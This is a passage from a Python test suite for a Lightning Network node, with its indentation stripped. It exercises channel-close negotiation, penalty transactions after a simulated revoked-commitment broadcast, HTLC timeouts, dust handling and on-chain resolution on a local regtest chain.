# Note that since they disagree on the ideal fee, they may conflict
# (first one in will win), so we cannot look at logs, we need to
# wait for mempool.
wait_for(lambda: bitcoind.rpc.getmempoolinfo()['size'] == num_peers)
bitcoind.generate_block(1)
for p in peers:
p.daemon.wait_for_log(' to ONCHAIN')
wait_for(lambda: 'ONCHAIN:Tracking mutual close transaction' in only_one(p.rpc.listpeers(l1.info['id'])['peers'][0]['channels'])['status'])
l1.daemon.wait_for_logs([' to ONCHAIN'] * num_peers)
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1")
def test_closing_negotiation_reconnect(node_factory, bitcoind):
disconnects = ['-WIRE_CLOSING_SIGNED',
'@WIRE_CLOSING_SIGNED',
'+WIRE_CLOSING_SIGNED']
l1 = node_factory.get_node(disconnect=disconnects, may_reconnect=True)
l2 = node_factory.get_node(may_reconnect=True)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
chan = l1.fund_channel(l2, 10**6)
l1.pay(l2, 200000000)
assert bitcoind.rpc.getmempoolinfo()['size'] == 0
# This should return with an error, then close.
with pytest.raises(RpcError, match=r'Channel close negotiation not finished'):
l1.rpc.close(chan, False, 0)
l1.daemon.wait_for_log(' to CHANNELD_SHUTTING_DOWN')
l2.daemon.wait_for_log(' to CHANNELD_SHUTTING_DOWN')
l1.daemon.wait_for_log(' to CLOSINGD_SIGEXCHANGE')
l2.daemon.wait_for_log(' to CLOSINGD_SIGEXCHANGE')
# And should put closing into mempool (happens async, so
# CLOSINGD_COMPLETE may come first).
l1.daemon.wait_for_logs(['sendrawtx exit 0', ' to CLOSINGD_COMPLETE'])
l2.daemon.wait_for_logs(['sendrawtx exit 0', ' to CLOSINGD_COMPLETE'])
assert bitcoind.rpc.getmempoolinfo()['size'] == 1
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1")
def test_penalty_inhtlc(node_factory, bitcoind, executor):
"""Test penalty transaction with an incoming HTLC"""
# We suppress each one after first commit; HTLC gets added not fulfilled.
# Feerates identical so we don't get gratuitous commit to update them
l1 = node_factory.get_node(disconnect=['=WIRE_COMMITMENT_SIGNED-nocommit'], may_fail=True, feerates=(7500, 7500, 7500))
l2 = node_factory.get_node(disconnect=['=WIRE_COMMITMENT_SIGNED-nocommit'])
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.fund_channel(l2, 10**6)
# Now, this will get stuck due to l1 commit being disabled..
t = executor.submit(l1.pay, l2, 100000000)
assert len(l1.getactivechannels()) == 2
assert len(l2.getactivechannels()) == 2
# They should both have commitments blocked now.
l1.daemon.wait_for_log('=WIRE_COMMITMENT_SIGNED-nocommit')
l2.daemon.wait_for_log('=WIRE_COMMITMENT_SIGNED-nocommit')
# Make sure l1 got l2's commitment to the HTLC, and sent to master.
l1.daemon.wait_for_log('UPDATE WIRE_CHANNEL_GOT_COMMITSIG')
# Take our snapshot.
tx = l1.rpc.dev_sign_last_tx(l2.info['id'])['tx']
# Let them continue
l1.rpc.dev_reenable_commit(l2.info['id'])
l2.rpc.dev_reenable_commit(l1.info['id'])
# Should fulfill.
l1.daemon.wait_for_log('peer_in WIRE_UPDATE_FULFILL_HTLC')
l1.daemon.wait_for_log('peer_out WIRE_REVOKE_AND_ACK')
l2.daemon.wait_for_log('peer_out WIRE_UPDATE_FULFILL_HTLC')
l1.daemon.wait_for_log('peer_in WIRE_REVOKE_AND_ACK')
# Payment should now complete.
t.result(timeout=10)
# Now we really mess things up!
bitcoind.rpc.sendrawtransaction(tx)
bitcoind.generate_block(1)
l2.daemon.wait_for_log(' to ONCHAIN')
# FIXME: l1 should try to stumble along!
wait_for(lambda: len(l2.getactivechannels()) == 0)
# l2 should spend all of the outputs (except to-us).
# Could happen in any order, depending on commitment tx.
needle = l2.daemon.logsearch_start
l2.wait_for_onchaind_broadcast('OUR_PENALTY_TX',
'THEIR_REVOKED_UNILATERAL/DELAYED_OUTPUT_TO_THEM')
l2.daemon.logsearch_start = needle
l2.wait_for_onchaind_broadcast('OUR_PENALTY_TX',
'THEIR_REVOKED_UNILATERAL/THEIR_HTLC')
# FIXME: test HTLC tx race!
# 100 blocks later, all resolved.
bitcoind.generate_block(100)
l2.daemon.wait_for_log('onchaind complete, forgetting peer')
outputs = l2.rpc.listfunds()['outputs']
assert [o['status'] for o in outputs] == ['confirmed'] * 2
# Allow some lossage for fees.
assert sum(o['value'] for o in outputs) < 10**6
assert sum(o['value'] for o in outputs) > 10**6 - 15000
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1")
def test_penalty_outhtlc(node_factory, bitcoind, executor):
"""Test penalty transaction with an outgoing HTLC"""
# First we need to get funds to l2, so suppress after second.
# Feerates identical so we don't get gratuitous commit to update them
l1 = node_factory.get_node(disconnect=['=WIRE_COMMITMENT_SIGNED*3-nocommit'], may_fail=True, feerates=(7500, 7500, 7500))
l2 = node_factory.get_node(disconnect=['=WIRE_COMMITMENT_SIGNED*3-nocommit'])
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.fund_channel(l2, 10**6)
# Move some across to l2.
l1.pay(l2, 200000000)
assert not l1.daemon.is_in_log('=WIRE_COMMITMENT_SIGNED')
assert not l2.daemon.is_in_log('=WIRE_COMMITMENT_SIGNED')
# Now, this will get stuck due to l1 commit being disabled..
t = executor.submit(l2.pay, l1, 100000000)
# Make sure we get signature from them.
l1.daemon.wait_for_log('peer_in WIRE_UPDATE_ADD_HTLC')
l1.daemon.wait_for_log('peer_in WIRE_COMMITMENT_SIGNED')
# They should both have commitments blocked now.
l1.daemon.wait_for_log('dev_disconnect: =WIRE_COMMITMENT_SIGNED')
l2.daemon.wait_for_log('dev_disconnect: =WIRE_COMMITMENT_SIGNED')
# Make sure both sides got revoke_and_ack for that commitment.
l1.daemon.wait_for_log('peer_in WIRE_REVOKE_AND_ACK')
l2.daemon.wait_for_log('peer_in WIRE_REVOKE_AND_ACK')
# Take our snapshot.
tx = l1.rpc.dev_sign_last_tx(l2.info['id'])['tx']
# Let them continue
l1.rpc.dev_reenable_commit(l2.info['id'])
l2.rpc.dev_reenable_commit(l1.info['id'])
# Thread should complete.
t.result(timeout=10)
# Make sure both sides got revoke_and_ack for final.
l1.daemon.wait_for_log('peer_in WIRE_REVOKE_AND_ACK')
l2.daemon.wait_for_log('peer_in WIRE_REVOKE_AND_ACK')
# Now we really mess things up!
bitcoind.rpc.sendrawtransaction(tx)
bitcoind.generate_block(1)
l2.daemon.wait_for_log(' to ONCHAIN')
# FIXME: l1 should try to stumble along!
# l2 should spend all of the outputs (except to-us).
# Could happen in any order, depending on commitment tx.
needle = l2.daemon.logsearch_start
l2.wait_for_onchaind_broadcast('OUR_PENALTY_TX',
'THEIR_REVOKED_UNILATERAL/DELAYED_OUTPUT_TO_THEM')
l2.daemon.logsearch_start = needle
l2.wait_for_onchaind_broadcast('OUR_PENALTY_TX',
'THEIR_REVOKED_UNILATERAL/OUR_HTLC')
l2.daemon.logsearch_start = needle
l2.daemon.wait_for_log('Ignoring output.*: THEIR_REVOKED_UNILATERAL/OUTPUT_TO_US')
# FIXME: test HTLC tx race!
# 100 blocks later, all resolved.
bitcoind.generate_block(100)
wait_for(lambda: len(l2.rpc.listpeers()['peers']) == 0)
outputs = l2.rpc.listfunds()['outputs']
assert [o['status'] for o in outputs] == ['confirmed'] * 3
# Allow some lossage for fees.
assert sum(o['value'] for o in outputs) < 10**6
assert sum(o['value'] for o in outputs) > 10**6 - 15000
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1")
def test_onchain_first_commit(node_factory, bitcoind):
"""Onchain handling where funder immediately drops to chain"""
# HTLC 1->2, 1 fails just after funding.
disconnects = ['+WIRE_FUNDING_LOCKED', 'permfail']
l1 = node_factory.get_node(disconnect=disconnects)
# Make locktime different, as we once had them reversed!
l2 = node_factory.get_node(options={'watchtime-blocks': 10})
l1.fundwallet(10**7)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.rpc.fundchannel(l2.info['id'], 10**6)
l1.daemon.wait_for_log('sendrawtx exit 0')
l1.bitcoin.generate_block(1)
# l1 will drop to chain.
l1.daemon.wait_for_log('permfail')
l1.daemon.wait_for_log('sendrawtx exit 0')
l1.bitcoin.generate_block(1)
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
# 10 later, l1 should collect its to-self payment.
bitcoind.generate_block(10)
l1.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_UNILATERAL/DELAYED_OUTPUT_TO_US')
# 94 later, l2 is done.
bitcoind.generate_block(94)
l2.daemon.wait_for_log('onchaind complete, forgetting peer')
# Now, 100 blocks and l1 should be done.
bitcoind.generate_block(6)
l1.daemon.wait_for_log('onchaind complete, forgetting peer')
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1")
def test_onchain_unwatch(node_factory, bitcoind):
"""Onchaind should not watch random spends"""
l1, l2 = node_factory.line_graph(2)
l1.pay(l2, 200000000)
l1.rpc.dev_fail(l2.info['id'])
l1.daemon.wait_for_log('Failing due to dev-fail command')
l1.wait_for_channel_onchain(l2.info['id'])
l1.bitcoin.generate_block(1)
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
# 10 later, l1 should collect its to-self payment.
bitcoind.generate_block(10)
l1.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_UNILATERAL/DELAYED_OUTPUT_TO_US')
# First time it sees it, onchaind cares.
bitcoind.generate_block(1)
l1.daemon.wait_for_log('Resolved OUR_UNILATERAL/DELAYED_OUTPUT_TO_US by our proposal '
'OUR_DELAYED_RETURN_TO_WALLET')
# Now test unrelated onchain churn.
# Daemon gets told about wallet; says it doesn't care.
l1.rpc.withdraw(l1.rpc.newaddr()['bech32'], 'all')
bitcoind.generate_block(1)
l1.daemon.wait_for_log("but we don't care")
# And lightningd should respect that!
assert not l1.daemon.is_in_log("Can't unwatch txid")
# So these should not generate further messages
for i in range(5):
l1.rpc.withdraw(l1.rpc.newaddr()['bech32'], 'all')
bitcoind.generate_block(1)
# Make sure it digests the block
sync_blockheight(bitcoind, [l1])
# We won't see this again.
assert not l1.daemon.is_in_log("but we don't care",
start=l1.daemon.logsearch_start)
# Note: for this test we leave onchaind running, so we can detect
# any leaks!
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1")
def test_onchaind_replay(node_factory, bitcoind):
disconnects = ['+WIRE_REVOKE_AND_ACK', 'permfail']
options = {'watchtime-blocks': 201, 'cltv-delta': 101}
# Feerates identical so we don't get gratuitous commit to update them
l1 = node_factory.get_node(options=options, disconnect=disconnects, feerates=(7500, 7500, 7500))
l2 = node_factory.get_node(options=options)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.fund_channel(l2, 10**6)
rhash = l2.rpc.invoice(10**8, 'onchaind_replay', 'desc')['payment_hash']
routestep = {
'msatoshi': 10**8 - 1,
'id': l2.info['id'],
'delay': 101,
'channel': '1x1x1'
}
l1.rpc.sendpay([routestep], rhash)
l1.daemon.wait_for_log('sendrawtx exit 0')
bitcoind.generate_block(1)
# Wait for nodes to notice the failure, this seach needle is after the
# DB commit so we're sure the tx entries in onchaindtxs have been added
l1.daemon.wait_for_log("Deleting channel .* due to the funding outpoint being spent")
l2.daemon.wait_for_log("Deleting channel .* due to the funding outpoint being spent")
# We should at least have the init tx now
assert len(l1.db_query("SELECT * FROM channeltxs;")) > 0
assert len(l2.db_query("SELECT * FROM channeltxs;")) > 0
# Generate some blocks so we restart the onchaind from DB (we rescan
# last_height - 100)
bitcoind.generate_block(100)
sync_blockheight(bitcoind, [l1, l2])
# l1 should still have a running onchaind
assert len(l1.db_query("SELECT * FROM channeltxs;")) > 0
l2.rpc.stop()
l1.restart()
# Can't wait for it, it's after the "Server started" wait in restart()
assert l1.daemon.is_in_log(r'Restarting onchaind for channel')
# l1 should still notice that the funding was spent and that we should react to it
l1.daemon.wait_for_log("Propose handling OUR_UNILATERAL/DELAYED_OUTPUT_TO_US by OUR_DELAYED_RETURN_TO_WALLET")
sync_blockheight(bitcoind, [l1])
bitcoind.generate_block(10)
sync_blockheight(bitcoind, [l1])
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1")
def test_onchain_dust_out(node_factory, bitcoind, executor):
"""Onchain handling of outgoing dust htlcs (they should fail)"""
# HTLC 1->2, 1 fails after it's irrevocably committed
disconnects = ['@WIRE_REVOKE_AND_ACK', 'permfail']
# Feerates identical so we don't get gratuitous commit to update them
l1 = node_factory.get_node(disconnect=disconnects, feerates=(7500, 7500, 7500))
l2 = node_factory.get_node()
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.fund_channel(l2, 10**6)
# Must be dust!
rhash = l2.rpc.invoice(1, 'onchain_dust_out', 'desc')['payment_hash']
routestep = {
'msatoshi': 1,
'id': l2.info['id'],
'delay': 5,
'channel': '1x1x1'
}
l1.rpc.sendpay([routestep], rhash)
payfuture = executor.submit(l1.rpc.waitsendpay, rhash)
# l1 will drop to chain.
l1.daemon.wait_for_log('permfail')
l1.wait_for_channel_onchain(l2.info['id'])
l1.bitcoin.generate_block(1)
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
# We use 3 blocks for "reasonable depth"
bitcoind.generate_block(3)
# It should fail.
with pytest.raises(RpcError, match=r'WIRE_PERMANENT_CHANNEL_FAILURE: missing in commitment tx'):
payfuture.result(5)
# Retry payment, this should fail (and, as a side-effect, tickle a
# bug).
with pytest.raises(RpcError, match=r'WIRE_UNKNOWN_NEXT_PEER'):
l1.rpc.sendpay([routestep], rhash)
# 6 later, l1 should collect its to-self payment.
bitcoind.generate_block(6)
l1.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_UNILATERAL/DELAYED_OUTPUT_TO_US')
# 94 later, l2 is done.
bitcoind.generate_block(94)
l2.daemon.wait_for_log('onchaind complete, forgetting peer')
# Restart l1, it should not crash!
l1.restart()
# Now, 100 blocks and l1 should be done.
bitcoind.generate_block(6)
l1.daemon.wait_for_log('onchaind complete, forgetting peer')
# Payment failed, BTW
assert only_one(l2.rpc.listinvoices('onchain_dust_out')['invoices'])['status'] == 'unpaid'
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1")
def test_onchain_timeout(node_factory, bitcoind, executor):
"""Onchain handling of outgoing failed htlcs"""
# HTLC 1->2, 1 fails just after it's irrevocably committed
disconnects = ['+WIRE_REVOKE_AND_ACK*3', 'permfail']
# Feerates identical so we don't get gratuitous commit to update them
l1 = node_factory.get_node(disconnect=disconnects, feerates=(7500, 7500, 7500))
l2 = node_factory.get_node()
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.fund_channel(l2, 10**6)
rhash = l2.rpc.invoice(10**8, 'onchain_timeout', 'desc')['payment_hash']
# We underpay, so it fails.
routestep = {
'msatoshi': 10**8 - 1,
'id': l2.info['id'],
'delay': 5,
'channel': '1x1x1'
}
l1.rpc.sendpay([routestep], rhash)
with pytest.raises(RpcError):
l1.rpc.waitsendpay(rhash)
# Make sure CLTVs are different, in case it confuses onchaind.
bitcoind.generate_block(1)
sync_blockheight(bitcoind, [l1])
# Second one will cause drop to chain.
l1.rpc.sendpay([routestep], rhash)
payfuture = executor.submit(l1.rpc.waitsendpay, rhash)
# l1 will drop to chain.
l1.daemon.wait_for_log('permfail')
l1.wait_for_channel_onchain(l2.info['id'])
l1.bitcoin.generate_block(1)
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
# Wait for timeout.
l1.daemon.wait_for_logs(['Propose handling OUR_UNILATERAL/DELAYED_OUTPUT_TO_US by OUR_DELAYED_RETURN_TO_WALLET .* after 5 blocks',
'Propose handling OUR_UNILATERAL/OUR_HTLC by OUR_HTLC_TIMEOUT_TX .* after 6 blocks'])
bitcoind.generate_block(4)
l1.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_UNILATERAL/DELAYED_OUTPUT_TO_US')
bitcoind.generate_block(1)
l1.wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TX',
'OUR_UNILATERAL/OUR_HTLC')
# We use 3 blocks for "reasonable depth"
bitcoind.generate_block(3)
# It should fail.
with pytest.raises(RpcError, match=r'WIRE_PERMANENT_CHANNEL_FAILURE: timed out'):
payfuture.result(5)
# 2 later, l1 spends HTLC (5 blocks total).
bitcoind.generate_block(2)
l1.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_HTLC_TIMEOUT_TX/DELAYED_OUTPUT_TO_US')
# 89 later, l2 is done.
bitcoind.generate_block(89)
l2.daemon.wait_for_log('onchaind complete, forgetting peer')
# Now, 100 blocks and l1 should be done.
bitcoind.generate_block(10)
sync_blockheight(bitcoind, [l1])
assert not l1.daemon.is_in_log('onchaind complete, forgetting peer')
bitcoind.generate_block(1)
l1.daemon.wait_for_log('onchaind complete, forgetting peer')
# Payment failed, BTW
assert only_one(l2.rpc.listinvoices('onchain_timeout')['invoices'])['status'] == 'unpaid'
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1")
def test_onchain_middleman(node_factory, bitcoind):
# HTLC 1->2->3, 1->2 goes down after 2 gets preimage from 3.
disconnects = ['-WIRE_UPDATE_FULFILL_HTLC', 'permfail']
l1 = node_factory.get_node()
l2 = node_factory.get_node(disconnect=disconnects)
l3 = node_factory.get_node()
# l2 connects to both, so l1 can't reconnect and thus l2 drops to chain
l2.rpc.connect(l1.info['id'], 'localhost', l1.port)
l2.rpc.connect(l3.info['id'], 'localhost', l3.port)
l2.fund_channel(l1, 10**6)
c23 = l2.fund_channel(l3, 10**6)
# Make sure routes finalized.
bitcoind.generate_block(5)
l1.wait_channel_active(c23)
# Give l1 some money to play with.
l2.pay(l1, 2 * 10**8)
# Must be bigger than dust!
rhash = l3.rpc.invoice(10**8, 'middleman', 'desc')['payment_hash']
route = l1.rpc.getroute(l3.info['id'], 10**8, 1)["route"]
assert len(route) == 2
q = queue.Queue()
def try_pay():
try:
l1.rpc.sendpay(route, rhash)
l1.rpc.waitsendpay(rhash)
q.put(None)
except Exception as err:
q.put(err)
t = threading.Thread(target=try_pay)
t.daemon = True
t.start()
# l2 will drop to chain.
l2.daemon.wait_for_log('sendrawtx exit 0')
l1.bitcoin.generate_block(1)
l2.daemon.wait_for_log(' to ONCHAIN')
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log('OUR_UNILATERAL/THEIR_HTLC')
# l2 should fulfill HTLC onchain, and spend to-us (any order)
l2.wait_for_onchaind_broadcast('OUR_HTLC_SUCCESS_TX',
'OUR_UNILATERAL/THEIR_HTLC')
# Payment should succeed.
l1.bitcoin.generate_block(1)
l1.daemon.wait_for_log('THEIR_UNILATERAL/OUR_HTLC gave us preimage')
err = q.get(timeout=10)
if err:
print("Got err from sendpay thread")
raise err
t.join(timeout=1)
assert not t.isAlive()
# Three more, l2 can spend to-us.
bitcoind.generate_block(3)
l2.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_UNILATERAL/DELAYED_OUTPUT_TO_US')
# One more block, HTLC tx is now spendable.
l1.bitcoin.generate_block(1)
l2.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_HTLC_SUCCESS_TX/DELAYED_OUTPUT_TO_US')
# 100 blocks after last spend, l2 should be done.
l1.bitcoin.generate_block(100)
l2.daemon.wait_for_log('onchaind complete, forgetting peer')
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1")
def test_onchain_feechange(node_factory, bitcoind, executor):
"""Onchain handling when we restart with different fees"""
# HTLC 1->2, 2 fails just after they're both irrevocably committed
# We need 2 to drop to chain, because then 1's HTLC timeout tx
# is generated on-the-fly, and is thus feerate sensitive.
disconnects = ['-WIRE_UPDATE_FAIL_HTLC', 'permfail']
l1 = node_factory.get_node(may_reconnect=True)
l2 = node_factory.get_node(disconnect=disconnects,
may_reconnect=True)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.fund_channel(l2, 10**6)
rhash = l2.rpc.invoice(10**8, 'onchain_timeout', 'desc')['payment_hash']
# We underpay, so it fails.
routestep = {
'msatoshi': 10**8 - 1,
'id': l2.info['id'],
'delay': 5,
'channel': '1x1x1'
}
executor.submit(l1.rpc.sendpay, [routestep], rhash)
# l2 will drop to chain.
l2.daemon.wait_for_log('permfail')
l2.wait_for_channel_onchain(l1.info['id'])
bitcoind.generate_block(1)
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
# Wait for timeout.
l1.daemon.wait_for_log('Propose handling THEIR_UNILATERAL/OUR_HTLC by OUR_HTLC_TIMEOUT_TO_US .* after 6 blocks')
bitcoind.generate_block(6)
l1.wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TO_US',
'THEIR_UNILATERAL/OUR_HTLC')
# Make sure that gets included.
bitcoind.generate_block(1)
# Now we restart with different feerates.
l1.stop()
l1.daemon.cmd_line.append('--override-fee-rates=20000/9000/2000')
l1.start()
# We recognize different proposal as ours.
l1.daemon.wait_for_log('Resolved THEIR_UNILATERAL/OUR_HTLC by our proposal OUR_HTLC_TIMEOUT_TO_US')
# We use 3 blocks for "reasonable depth", so add two more
bitcoind.generate_block(2)
# Note that the very similar test_onchain_timeout looks for a
# different string: that's because it sees the JSONRPC response,
# and due to the l1 restart, there is none here.
l1.daemon.wait_for_log('WIRE_PERMANENT_CHANNEL_FAILURE')
# 90 later, l2 is done
bitcoind.generate_block(89)
sync_blockheight(bitcoind, [l2])
assert not l2.daemon.is_in_log('onchaind complete, forgetting peer')
bitcoind.generate_block(1)
l2.daemon.wait_for_log('onchaind complete, forgetting peer')
# Now, 7 blocks and l1 should be done.
bitcoind.generate_block(6)
sync_blockheight(bitcoind, [l1])
assert not l1.daemon.is_in_log('onchaind complete, forgetting peer')
bitcoind.generate_block(1)
l1.daemon.wait_for_log('onchaind complete, forgetting peer')
# Payment failed, BTW
assert only_one(l2.rpc.listinvoices('onchain_timeout')['invoices'])['status'] == 'unpaid'
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1 for dev-set-fees")
def test_onchain_all_dust(node_factory, bitcoind, executor):
"""Onchain handling when we reduce output to all dust"""
# HTLC 1->2, 2 fails just after they're both irrevocably committed
# We need 2 to drop to chain, because then 1's HTLC timeout tx
# is generated on-the-fly, and is thus feerate sensitive.
disconnects = ['-WIRE_UPDATE_FAIL_HTLC', 'permfail']
# Feerates identical so we don't get gratuitous commit to update them
l1 = node_factory.get_node(options={'dev-no-reconnect': None}, feerates=(7500, 7500, 7500))
l2 = node_factory.get_node(disconnect=disconnects)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.fund_channel(l2, 10**6)
rhash = l2.rpc.invoice(10**8, 'onchain_timeout', 'desc')['payment_hash']
# We underpay, so it fails.
routestep = {
'msatoshi': 10**7 - 1,
'id': l2.info['id'],
'delay': 5,
'channel': '1x1x1'
}
executor.submit(l1.rpc.sendpay, [routestep], rhash)
# l2 will drop to chain.
l2.daemon.wait_for_log('permfail')
l2.wait_for_channel_onchain(l1.info['id'])
# Make l1's fees really high (and wait for it to exceed 50000)
l1.set_feerates((100000, 100000, 100000))
l1.daemon.wait_for_log('Feerate estimate for normal set to [56789][0-9]{4}')
bitcoind.generate_block(1)
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
# Wait for timeout.
l1.daemon.wait_for_log('Propose handling THEIR_UNILATERAL/OUR_HTLC by IGNORING_TINY_PAYMENT .* after 6 blocks')
bitcoind.generate_block(5)
l1.wait_for_onchaind_broadcast('IGNORING_TINY_PAYMENT',
'THEIR_UNILATERAL/OUR_HTLC')
l1.daemon.wait_for_log('Ignoring output 0 of .*: THEIR_UNILATERAL/OUR_HTLC')
# 100 deep and l2 forgets.
bitcoind.generate_block(93)
sync_blockheight(bitcoind, [l1, l2])
assert not l2.daemon.is_in_log('onchaind complete, forgetting peer')
assert not l1.daemon.is_in_log('onchaind complete, forgetting peer')
bitcoind.generate_block(1)
l2.daemon.wait_for_log('onchaind complete, forgetting peer')
# l1 does not wait for ignored payment.
l1.daemon.wait_for_log('onchaind complete, forgetting peer')
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1 for dev_fail")
def test_onchain_different_fees(node_factory, bitcoind, executor):
"""Onchain handling when we've had a range of fees"""
l1, l2 = node_factory.line_graph(2, fundchannel=True, fundamount=10**7,
opts={'may_reconnect': True})
l2.rpc.dev_ignore_htlcs(id=l1.info['id'], ignore=True)
p1 = executor.submit(l1.pay, l2, 1000000000)
l1.daemon.wait_for_log('htlc 0: RCVD_ADD_ACK_COMMIT->SENT_ADD_ACK_REVOCATION')
l1.set_feerates((16000, 7500, 3750))
p2 = executor.submit(l1.pay, l2, 900000000)
l1.daemon.wait_for_log('htlc 1: RCVD_ADD_ACK_COMMIT->SENT_ADD_ACK_REVOCATION')
# Restart with different feerate for second HTLC.
l1.set_feerates((5000, 5000, 3750))
l1.restart()
l1.daemon.wait_for_log('peer_out WIRE_UPDATE_FEE')
p3 = executor.submit(l1.pay, l2, 800000000)
l1.daemon.wait_for_log('htlc 2: RCVD_ADD_ACK_COMMIT->SENT_ADD_ACK_REVOCATION')
# Drop to chain
l1.rpc.dev_fail(l2.info['id'])
l1.wait_for_channel_onchain(l2.info['id'])
bitcoind.generate_block(1)
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
# Both sides should have correct feerate
assert l1.db_query('SELECT min_possible_feerate, max_possible_feerate FROM channels;') == [{
'min_possible_feerate': 5000,
'max_possible_feerate': 16000
}]
assert l2.db_query('SELECT min_possible_feerate, max_possible_feerate FROM channels;') == [{
'min_possible_feerate': 5000,
'max_possible_feerate': 16000
}]
bitcoind.generate_block(5)
# Three HTLCs, and one for the to-us output.
l1.daemon.wait_for_logs(['sendrawtx exit 0'] * 4)
# We use 3 blocks for "reasonable depth"
bitcoind.generate_block(3)
with pytest.raises(Exception):
p1.result(10)
with pytest.raises(Exception):
p2.result(10)
with pytest.raises(Exception):
p3.result(10)
# Two more for HTLC timeout tx to be spent.
bitcoind.generate_block(2)
l1.daemon.wait_for_logs(['sendrawtx exit 0'] * 3)
# Now, 100 blocks it should be done.
bitcoind.generate_block(100)
wait_for(lambda: l1.rpc.listpeers()['peers'] == [])
wait_for(lambda: l2.rpc.listpeers()['peers'] == [])
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1")
def test_permfail_new_commit(node_factory, bitcoind, executor):
# Test case where we have two possible commits: it will use new one.
disconnects = ['-WIRE_REVOKE_AND_ACK', 'permfail']
# Feerates identical so we don't get gratuitous commit to update them
l1 = node_factory.get_node(options={'dev-no-reconnect': None}, feerates=(7500, 7500, 7500))
l2 = node_factory.get_node(disconnect=disconnects)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.fund_channel(l2, 10**6)
# This will fail at l2's end.
t = executor.submit(l1.pay, l2, 200000000)
l2.daemon.wait_for_log('dev_disconnect permfail')
l2.wait_for_channel_onchain(l1.info['id'])
bitcoind.generate_block(1)
l1.daemon.wait_for_log('Their unilateral tx, new commit point')
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log('Propose handling OUR_UNILATERAL/THEIR_HTLC by THEIR_HTLC_TIMEOUT_TO_THEM \\(IGNORING\\) after 6 blocks')
l1.daemon.wait_for_log('Propose handling THEIR_UNILATERAL/OUR_HTLC by OUR_HTLC_TIMEOUT_TO_US (.*) after 6 blocks')
# OK, time out HTLC.
bitcoind.generate_block(5)
l1.wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TO_US',
'THEIR_UNILATERAL/OUR_HTLC')
bitcoind.generate_block(1)
l1.daemon.wait_for_log('Resolved THEIR_UNILATERAL/OUR_HTLC by our proposal OUR_HTLC_TIMEOUT_TO_US')
l2.daemon.wait_for_log('Ignoring output.*: OUR_UNILATERAL/THEIR_HTLC')
t.cancel()
# Now, 100 blocks it should be done.
bitcoind.generate_block(100)
wait_for(lambda: l1.rpc.listpeers()['peers'] == [])
wait_for(lambda: l2.rpc.listpeers()['peers'] == [])
def setup_multihtlc_test(node_factory, bitcoind):
# l1 -> l2 -> l3 -> l4 -> l5 -> l6 -> l7
# l1 and l7 ignore and HTLCs they're sent.
# For each direction, we create these HTLCs with same payment_hash:
# 1 failed (CLTV1)
# 1 failed (CLTV2)
# 2 live (CLTV2)
# 1 live (CLTV3)
nodes = node_factory.line_graph(7, wait_for_announce=True,
opts={'dev-no-reconnect': None,
'may_reconnect': True})
# Balance by pushing half the funds.
b11 = nodes[-1].rpc.invoice(10**9 // 2, '1', 'balancer')['bolt11']
nodes[0].rpc.pay(b11)
nodes[0].rpc.dev_ignore_htlcs(id=nodes[1].info['id'], ignore=True)
nodes[-1].rpc.dev_ignore_htlcs(id=nodes[-2].info['id'], ignore=True)
preimage = "0" * 64
h = nodes[0].rpc.invoice(msatoshi=10**8, label='x', description='desc',
preimage=preimage)['payment_hash']
nodes[-1].rpc.invoice(msatoshi=10**8, label='x', description='desc',
preimage=preimage)['payment_hash']
# First, the failed attempts (paying wrong node). CLTV1
r = nodes[0].rpc.getroute(nodes[-2].info['id'], 10**8, 1)["route"]
nodes[0].rpc.sendpay(r, h)
with pytest.raises(RpcError, match=r'INCORRECT_OR_UNKNOWN_PAYMENT_DETAILS'):
nodes[0].rpc.waitsendpay(h)
